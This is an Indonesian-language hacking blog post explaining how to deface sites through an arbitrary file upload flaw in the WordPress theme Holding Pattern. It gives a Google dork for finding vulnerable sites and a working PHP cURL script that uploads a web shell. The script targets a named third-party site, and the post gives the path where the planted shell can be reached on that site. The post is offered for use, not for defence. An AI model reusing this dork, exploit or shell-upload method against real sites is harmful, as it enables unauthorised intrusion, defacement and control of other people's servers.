![[#] Cileungsi - Cyber [#]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjk1HOYbqs6aHW6qDZavfqnTwQQG5kiNm084lssR1JtBxAO96qp7au32gDDgxzSaN2u01Tetbo6zQEFULg5ucp4AmguJCKaA1qIqrCH7OVYrNkYLvtC_XuHeMGzgDTCEfyvOgNu54JEQfM/s1600/flamingtext__25040060229699109.png)
Oke ~ Kali ini Saya Akan Membahas Cara Deface Dengan Exploit ~ WordPress Theme Holding Pattern Arbitrary File Upload Vulnerability ...
Oke ~ Kali ini Saya Akan Membahas Cara Deface Dengan Exploit ~
WordPress Theme Holding Pattern Arbitrary File Upload Vulnerability '-')/
Oke Langsung Saja Kak Yupz ~_^
Dork : inurl:wp-content/themes/holding_pattern
Code PHP :
<?php
$uploadfile="chaYankVica.php";
$target = "http://www.shani-indira.org/wp-content/themes/holding_pattern/admin/upload-file.php";
$domain = explode("/", $target);
$server_addr = gethostbyname($domain[2]);
$ch = curl_init($target."/wp-content/themes/holding_pattern/admin/upload-file.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_VERBOSE, false);
curl_setopt($ch, CURLOPT_POSTFIELDS,array(md5($server_addr)=>"@$uploadfile",'upload_path'=>base64_encode('.')));
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Cara Upload Shellnya ? Bisa Menggunakan Xampp or Upload Shell via Shell cURL ON :)))
Shell Acces : www.shani-indira.org/wp-content/themes/holding_pattern/admin/chaYankVica.php
Oke Gitu Ajah Kali yah :)))
Semoga Bermamfaat 'v')/
Postingan
COMMENTS